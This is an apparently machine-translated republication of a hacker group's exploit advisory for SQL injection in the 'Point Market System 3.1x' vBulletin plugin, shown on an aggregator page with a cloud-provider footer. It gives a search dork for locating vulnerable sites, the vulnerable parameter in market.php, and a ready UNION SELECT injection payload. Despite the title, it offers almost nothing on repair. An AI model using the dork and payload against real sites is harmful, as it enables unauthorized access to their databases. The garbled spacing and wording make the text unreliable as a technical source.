Vbulletin plug-in Point Market System 3.1x SQL Injection defects and repair

Source: Internet
Author: User
Tags vbulletin

# (+) Exploit Title: Point Market System 3.1x vbulletin plugin SQL

Injection Vulnerability

# (+) Author: Net. Edit0r

# (+) E-mail: Black.hat.tm@Gmail.com

# (+) Dork: intext: Point Market System 3.1x

# (+) Versian: [3.1x]

# (+) Category: Web Apps [SQL]

# (+) Platform: Tested on: linux

# (+) Download plugin: http://www.megaupload.com /? D = 2R592KO0

____________________________________________________________________

____________________________________________________________________

You must register on the site!

The security problem in the file "market. Php" has been created. You

Can disable this security problem Plagn take it away.

[~] Vulnerable File:

# [+] Http://www.bkjia.com/market.php? Do = cat & id = [SQL]

[~] SQL injection Vulnerability

#[+]-1 + union + select + 1, 2, 4, 5, 6, @ version, 8, 9, 10, 11, 12, 13 --

# [+] Http://www.bkjia.com/market.php? Do = cat & id =-1 + union + select + 1, 2, 3, 4, 5, 6, @ version, 8, 9, 10, 11, 12, 13 --

[~] Demo Vedio:

Vedio: http://www.multiupload.com/S28Z2FCZQD

[~] Full Info plugin Point Market

Http://www.vbulletin.org/forum/showthread.php? P = 2159503 # post2159503

____________________________________________________________________

____________________________________________________________________

######################################## ################################

(+) IRANIAN Young HackerZ # Persian Gulf

(+) Black Hat Group Member: Net. Edit0r & DarkCoder & p3nt3st3r & H3x &

3H34N & D3adly # BHG

(+) Sp My Best Friend: HUrr! C4nE ~ B3hz4d ~ Virangar ~ S3cR3T ~ M4hd1

~ Mikili ~ P0W3RFU7 ~ Ali. Erroor and all Friends

(+) Gr33ts to: All Iranian HackerZ

######################################## ################################

 

 

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.